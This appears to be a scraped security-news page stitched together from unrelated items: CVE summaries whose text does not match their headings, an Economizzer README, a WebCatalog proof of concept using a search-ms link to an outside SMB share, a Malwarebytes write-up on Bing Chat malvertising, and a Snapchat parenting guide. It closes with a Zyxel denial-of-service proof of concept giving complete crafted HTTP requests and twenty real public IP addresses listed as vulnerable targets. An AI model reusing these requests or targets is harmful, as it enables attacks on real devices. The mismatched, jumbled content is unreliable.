Consensys gnark-crypto through 0.11.2 allows Signature Malleability. This occurs because deserialisation of EdDSA and ECDSA signatures does not ensure that the data is in a certain interval.

**Consensys gnark-crypto allows Signature Malleability**

Critical severity GitHub Reviewed Published Sep 28, 2023 to the GitHub Advisory Database • Updated Oct 2, 2023

GHSA-9xfq-8j3r-xp5g: Consensys gnark-crypto allows Signature Malleability

Versions of the package quill-mention before 4.0.0 are vulnerable to Cross-site Scripting (XSS) due to improper user-input sanitization, via the renderList function. **Note:**If the mentions list is sourced from unsafe (user-sourced) data, this might allow an injection attack when a Quill user hits @.

A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.

This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.

Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.

Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, < can be coded as &lt; and > can be coded as &gt; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses < and > as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.

The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.

**Types of attacks**

There are a few methods by which XSS can be manipulated:

Type

Origin

Description

**Stored**

Server

The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.

**Reflected**

Server

The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.

**DOM-based**

Client

The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.

**Mutated**

The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

**Affected environments**

The following environments are susceptible to an XSS attack:

*   Web servers
*   Application servers
*   Web application environments

**How to prevent**

This section describes the top best practices designed to specifically protect your code:

*   Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
*   Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
*   Give users the option to disable client-side scripts.
*   Redirect invalid requests.
*   Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
*   Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
*   Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

CVE-2023-26149: Snyk Vulnerability Database | Snyk

A host header injection vulnerability exists in gugoan's Economizzer v.0.9-beta1 and commit 3730880 (April 2023). By sending a specially crafted host header in the reset password request, it is possible to send password reset links to users which, once clicked, lead to an attacker-controlled server and thus leak the password reset token. This allows an attacker to reset other users' passwords.

** Economizzer**

Economizzer is a simple and open source personal finance manager system made in PHP Yii Framework 2.

It is available in the following languages: English, Spanish, Portuguese, Russian, Korean, Hungarian and French.

Learn more the features on the official website: www.economizzer.org

**Live Demo**

You can try: www.economizzer.org/web

> Use the user "joe" and password "123456".

**Requirements**

The minimum requirement by this application that your Web server supports PHP 5.4.0 and either apache2 or nginx.

> Required libraries: libapache2-mod-php, php-mbstring, php-xml, php-curl

**Installation**

    git clone https://github.com/gugoan/economizzer.git
    cd economizzer
    composer install
    

**Configuration**

In folder **economizzer/config/db.php** set as follows:

return \[
    'class' => 'yii\\db\\Connection',
    'dsn' => 'mysql:host=127.0.0.1;dbname=economizzer',
    'username' => 'USER',
    'password' => 'PASSWORD',
    'charset' => 'utf8',
    'enableSchemaCache' => true,
\];

And import the database sql file

> economizzer.sql

To test, go to **http://yourserver/economizzer/web** with user and password below:

> Use the user "joe" and password "123456".

**Contribution**

Please see CONTRIBUTING.

**License**

Economizzer is Copyright © 2014 Gustavo G. Andrade. It is free software, and may be redistributed under the terms specified in the LICENSE file.

**Donations**

To encourage the developer with new enhancements, web hosting costs, or even to buy him a good beer, support the project by making a donation.

**Thanks to**

CVE-2023-38877: GitHub - gugoan/economizzer: Open Source Personal Finance Manager

A remote code execution (RCE) vulnerability via an insecure file upload exists in gugoan's Economizzer v.0.9-beta1 and commit 3730880 (April 2023). A malicious attacker can upload a PHP web shell as an attachment when adding a new cash book entry. Afterwards, the attacker may visit the web shell and execute arbitrary commands.

CVE-2023-38874: GitHub - gugoan/economizzer: Open Source Personal Finance Manager

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber 1.3.4 and prior. A patch is available and anticipated to be part of the 2.x branch.

**Microweber Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published Sep 28, 2023 to the GitHub Advisory Database • Updated Sep 28, 2023

GHSA-rgf9-j7gv-rq22: Microweber Cross-site Scripting vulnerability

WebCatalog before 49.0 is vulnerable to Incorrect Access Control. WebCatalog calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances.

**CVE-2023-42222****Vulnerability summary**

WebCatalog before version 48.4.0 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource, in some circumstances. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened.

**Vulnerability Scan output**

**PoC Overview**

**PoC information**

The vulnerability can be confirmed by syncing a page that allows arbitary URLs. If a website is synced that contains search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools then an external SMB connection is created. This can then be used to bypass security protections on the local machine and present malicious files to the user, which would usually be blocked.

CVE-2023-42222: GitHub - itssixtyn3in/CVE-2023-42222

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 2.0.

CVE-2023-5244: huntr – Security Bounties for any GitHub repository

Categories: Threat Intelligence
Tags: bing chat

Tags: AI

Tags: malvertising

Tags: ads

Users looking for software downloads may be tricked into visiting malicious websites via their interaction with Bing Chat.



(Read more...)




The post Malicious ad served inside Bing's AI chatbot appeared first on Malwarebytes Labs.

In February 2023, Microsoft disclosed its new AI-assisted search engine, Bing Chat, powered by OpenAI's GPT-4. Even though Google has been dominating the search industry for years, this event was significant enough to generate not only interest but also plant the seed for a possible change in the balance in the future.

Considering that tech giants make most of their revenue from advertising, it wasn't surprising to see Microsoft introduce ads into Bing Chat shortly after its release. However, online ads have an inherent risk attached to them. In this blog, we show how users searching for software downloads can be tricked into visiting malicious sites and installing malware directly from a Bing Chat conversation. 

**Malvertising via a Bing Chat conversation**

Bing Chat is an interactive text and image application that provides a very different experience for online searches. After six months of it being public, Microsoft celebrated user engagement with over one billion chats.

Ads can be inserted into a Bing Chat conversation in various ways. One of those is when a user hovers over a link and an ad is displayed first before the organic result. In the example below, we asked where we could download a program called Advanced IP Scanner used by network administrators. When we place our cursor over the first sentence, a dialog appears showing an ad and the official website for this program right below it:

Users have the choice of visiting either link, although the first one may be more likely to be clicked on because of its position. Even though there is a small 'Ad' label next to this link, it would be easy to miss and view the link as a regular search result.

**Phishing site serves malware**

Upon clicking the first link, users are taken to a website (_mynetfoldersip\[.\]cfd_) whose purpose is to filter traffic and separate real victims from bots, sandboxes, or security researchers. It does that by checking your IP address, time zone, and various other system settings such as web rendering that identifies virtual machines.

Real humans are redirected to a fake site (_advenced-ip-scanner\[.\]com_) that mimics the official one while others are sent to a decoy page. The next step is for victims to download the supposed installer and run it.

The MSI installer contains three different files but only one is malicious and is a heavily obfuscated script:

Upon execution, the script reaches out to an external IP address (_65.21.119\[.\]59_) presumably to announce itself and receive an additional payload.

**Search evolves, malicious ads follow**

Threat actors continue to leverage search ads to redirect users to malicious sites hosting malware. While Bing Chat is a different search experience, it serves some of the same ads seen via a traditional Bing query.

In this case, the malicious actor hacked into the ad account of a legitimate Australian business and created two malicious ads, one targeting network admins (Advanced IP Scanner) and another lawyers (MyCase law manager):

With convincing landing pages, victims can easily be tricked into downloading malware and be none the wiser.

We recommend users pay particular attention to the websites they visit but also use a number of security tools to get additional protection. Malwarebytes provides security software for both consumers and businesses that includes web protection, ad blocking and malware detection.

This security incident was reported to Microsoft along with a few other related malicious ads.

**Indicators of Compromise**

Ad URL and cloaker

mynetfoldersip\[.\]cfd

Fake website

advenced-ip-scanner\[.\]com

Malicious MSI

ca83b930c2b34a167a39dc04c7917b9f360a95586bce45842868af6b9ad849a2

Script C2

65.21.119\[.\]59

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Malicious ad served inside Bing's AI chatbot

By Owais Sultan
Snapchat is a platform that may not be suitable for everyone, especially if the user is an underage child. So, what can you do?
This is a post from HackRead.com Read the original post: Snapchat Safety for Parents: How to Safeguard Your Child

Here are some important steps and guidelines that are essential for parents whose children use social media, especially platforms like Snapchat.

In this digital age, social media platforms like Snapchat and **TikTok** have become an integral part of our lives, especially for the younger generation. While Snapchat offers a unique way to connect with friends, it also raises concerns for parents regarding their child’s online safety.

As a parent, you might be wondering, “How can I protect my child on Snapchat?” This article will provide you with a comprehensive guide to keeping your child safe while using this popular platform.

However, before we begin, it’s important to note that Snapchat’s age restriction allows only children aged 13 and above to register an account. Nevertheless, considering the type of content and abusive incidents related to children on Snapchat, it is advisable to ensure that kids aged 18 and above are the only ones allowed to use the platform.

In fact, CBC Canada recently published an **article** titled “Child Luring and Exploitation on the Rise Through Snapchat” that delves deeply into the issue, shedding light on how children are increasingly exposed to and exploited on Snapchat.

****Understanding the Snapchat Landscape****

Before we delve into safety measures, it’s crucial to understand how Snapchat works. Snapchat allows users to send photos and videos that disappear after a short period, providing a sense of privacy. However, it also offers features like Stories and Discover, where users can share content with their friends or the public.

****Setting Privacy Settings****

One of the first steps in safeguarding your child on Snapchat is configuring their privacy settings. Here’s what you need to do:

**1\. Enable Ghost Mode**

Ghost Mode is a feature that hides your child’s location on the Snap Map. To enable this feature, go to your child’s profile, click on the gear icon, select ‘See My Location,’ and choose ‘Ghost Mode.’ This prevents their location from being visible to others.

**2\. Limit Who Can Send Snaps**

Ensure that only friends can send snaps to your child. To do this, go to ‘Settings,’ then ‘Who Can…’ and set ‘Send Me Snaps’ to ‘My Friends.’ This reduces the chances of strangers sending unsolicited snaps.

**3\. Control Who Can View Their Story**

To maintain a tighter circle around your child’s Snapchat activity, set ‘View My Story’ to ‘My Friends’ in the ‘Who Can…’ section under ‘Settings.’ This way, only trusted individuals can view their stories.

****Educating Your Child About Strangers****

Snapchat is a platform where your child can receive friend requests from strangers. It’s crucial to teach them not to accept requests from people they don’t know personally. Remind them that not everyone on the internet has good intentions, and sharing personal information can lead to risks.

****Utilizing Parental Control Apps****

**Consider using parental control apps** to further enhance your child’s online safety and monitor your child’s Snapchat without them knowing. These apps allow you to set screen time limits, track your child’s online activity, and receive alerts if they engage in potentially harmful behavior on Snapchat.

****Encouraging Open Communication****

Maintaining open communication with your child is paramount. Make sure your child knows they can approach you with any concerns or uncomfortable experiences on Snapchat. A trusting relationship will make it easier for your child to seek help when needed.

****Monitoring Their Activity****

While trust is essential, it’s also wise to monitor your child’s Snapchat activity discreetly. You can do this by:

**1\. Adding Them as a Friend**

By adding your child as a friend on Snapchat, you can view their snaps and stories without them knowing. This allows you to keep an eye on their interactions without invading their privacy.

**2\. Checking Their Friends List**

Regularly review your child’s friends list to ensure they only have real-life friends added. If you notice any unfamiliar usernames, inquire about them. This helps in identifying potential risks.

****Teaching Responsible Posting****

Snapchat encourages sharing moments, but your child should be aware of the consequences of oversharing. Remind them not to post sensitive information, such as their location or personal details, and to avoid sharing inappropriate content. Once something is online, it’s challenging to remove it entirely.

****Conclusion****

In conclusion, ensuring your child’s safety on Snapchat and other platforms involves a combination of setting privacy settings, educating them about online dangers, maintaining open communication, discreetly monitoring their activity, teaching responsible posting, and using parental control apps. By taking these proactive steps, you can provide a secure environment for your child to enjoy social media responsibly.

Remember that staying involved in your child’s online world is the key to their safety. By being aware of their Snapchat usage and providing guidance, you can help them make informed choices and navigate the digital landscape with confidence.

****RELATED ARTICLES****

Teen girl facing up to 10 years for sending nude selfie

Student uses Snapchat’s gender filter to bust pervert cop

9 risky apps that you need to monitor on your kids’ smartphone

Microsoft’s new tool detects, reports pedophiles from online chats

Snapchat Safety for Parents: How to Safeguard Your Child

Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

**Rumble**

ZYXEL-PMG2005-T20B has a denial of service vulnerability.Buffer Overflow vulnerability in ZYXEL ZYXEL v.PMG2005-T20B allows a remote attacker to cause a denial of service via a crafted script to the uid parameter in the cgi-bin/login.asp component.

Zyxel is a leading global provider of comprehensive communication and information solutions, providing innovative technology and product solutions for telecom operators, government and enterprise customers, and consumers worldwide. ZYXEL-PMG2005-T20B has a denial of service vulnerability. Attackers can exploit this vulnerability to cause the browser to crash.

Triggered process：Using a valid SESSIONID of the ZYXEL-PMG2005-T20B product, when the number of admin in the uid reaches 50, backend parsing can cause any web application of the product ZYXEL-PMG2005-T20B to crash.

The following are the details of the vulnerability:  
1.Vulnerability Address：http://177.221.16.243/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.16.243  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.16.243/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
2.Vulnerability Address：http://179.191.53.240/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.240  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.240/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution  
3.  
Vulnerability Address：http://179.191.53.133/cgi-bin/login.asp

Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 179.191.53.133  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://179.191.53.133/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

Vulnerability Address：http://177.221.17.76/cgi-bin/login.asp  
Request Package：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: 177.221.17.76  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://177.221.17.76/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Browser crashes after execution

5.Vulnerability Address：http://187.111.205.144/cgi-bin/login.asp  
6.Vulnerability Address：http://179.191.53.138/cgi-bin/login.asp  
7.Vulnerability Address：http://187.111.205.157/cgi-bin/login.asp  
8.Vulnerability Address：http://189.36.156.42/cgi-bin/login.asp  
9.Vulnerability Address：http://179.191.53.15/cgi-bin/login.asp  
10.Vulnerability Address：http://45.182.161.27/cgi-bin/login.asp  
11.Vulnerability Address：http://45.182.161.46/cgi-bin/login.asp  
12.Vulnerability Address：http://45.182.161.42/cgi-bin/login.asp  
13.Vulnerability Address：http://45.182.161.47/cgi-bin/login.asp  
14.Vulnerability Address：http://45.182.161.43/cgi-bin/login.asp  
15.Vulnerability Address：http://45.182.161.25/cgi-bin/login.asp  
16.Vulnerability Address：http://179.191.53.89/cgi-bin/login.asp  
17.Vulnerability Address：http://179.107.195.230/cgi-bin/login.asp  
18.Vulnerability Address：http://45.182.161.41/cgi-bin/login.asp  
19.Vulnerability Address：http://45.182.161.33/cgi-bin/login.asp  
20.Vulnerability Address：http://45.182.161.45/cgi-bin/login.asp

Request package is：  
GET /cgi-bin/index.asp HTTP/1.1  
Host: IP  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://IP/cgi-bin/login.asp  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie:SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234  
Connection: close

Replacing the above two IPs with the target IP can cause the browser to crash

The following is a vulnerability replay video:  
https://github.com/Rumble00/Rumble/assets/145107465/c1ad7082-513f-427f-9706-30c75097d586

Tag

#git